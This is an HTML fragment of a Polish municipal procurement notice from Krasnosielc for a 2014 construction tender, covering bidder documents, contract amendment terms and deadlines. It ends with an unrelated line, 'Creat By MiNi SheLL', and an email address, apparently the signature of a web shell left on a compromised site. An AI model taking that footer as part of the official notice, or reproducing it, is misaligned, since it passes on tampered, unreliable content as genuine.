<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- ofertę na formularzu stanowiącym załącznik do SIWZ
- zaakceptowany wzór umowy
- kosztorys ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy. 
1) Jakakolwiek zmiana przedmiotowej umowy w sprawie zamówienia publicznego, powinna być dokonana z zachowaniem formy pisemnej, pod rygorem nieważności.
2) Strony zgodnie potwierdzają, że dopuszczalna jest w każdym czasie zmiana treści nieistotnych postanowień niniejszej umowy.
3) Zmiana istotnych postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru wykonawców jest możliwa przy spełnieniu poniższych warunków dokonania takich zmian:
 Termin realizacji przedmiotu umowy w przypadku:
a) wystąpienia okoliczności niezależnych od Wykonawcy przy zachowaniu przez niego      należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu zamówienia.
b) zaistniałych warunków geologicznych, terenowych, archeologicznych, wodnych, np.
   niewypałów, niewybuchów, wykopalisk archeologicznych, utrudniających wykonanie umowy,
c) nie przekazania Wykonawcy przez Zamawiającego dokumentów budowy, do których przekazania Zamawiający był zobowiązany.
d) wstrzymania przez Zamawiającego robót nie wynikających z okoliczności leżących po stronie Wykonawcy. Nie dotyczy to okoliczności wstrzymania robót przez inspektora nadzoru Zamawiającego w przypadku stwierdzenia nieprawidłowości zawinionych przez Wykonawcę.
e) konieczność wykonania przez Zamawiającego korekty projektu dla usunięcia wad dostarczonej dokumentacji,
f) nadzwyczajne i niesprzyjające warunki atmosferyczne.
W przypadku zmiany terminu realizacji przedmiotu umowy, wymienionego w literach
a-e), termin ten może ulec przedłużeniu nie dłużej jednak, niż o czas trwania tych okoliczności.
2) Wysokość ceny ryczałtowej brutto w przypadku:
a) zmiany stawki podatku VAT dla robót objętych przedmiotem zamówienia.
3) Forma zabezpieczenia należytego wykonania umowy-zgodnie z art. 149, ust. 1 Pzp.
4) Rozszerzenie odpowiedzialności z tytułu rękojmi oraz przedłużenia terminu udzielonej gwarancji w przypadku zaproponowania takiego rozwiązania przez Wykonawcę.
5) Zmiana kierownika budowy, kierowników robót bądź inspektorów nadzoru w przypadku śmierci, choroby, rezygnacji, zwolnienia pracownika lub innych zdarzeń losowych,dotyczących w/w osób. W przypadku zmiany nowych kierowników budowy bądź robót osoba    ta musi spełnić wymagania określone w SIWZ dla tych osób.
6) Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę, jednocześnie nie stanowią one zobowiązania Zamawiającego na ich wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krasnosielc.bipst.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Krasnosielc Rynek 40 06-212 Krasnosielc
pokój nr 20..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2014 godzina 10:00, miejsce: Urząd Gminy Krasnosielc Rynek 40 06-212 Krasnosielc
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com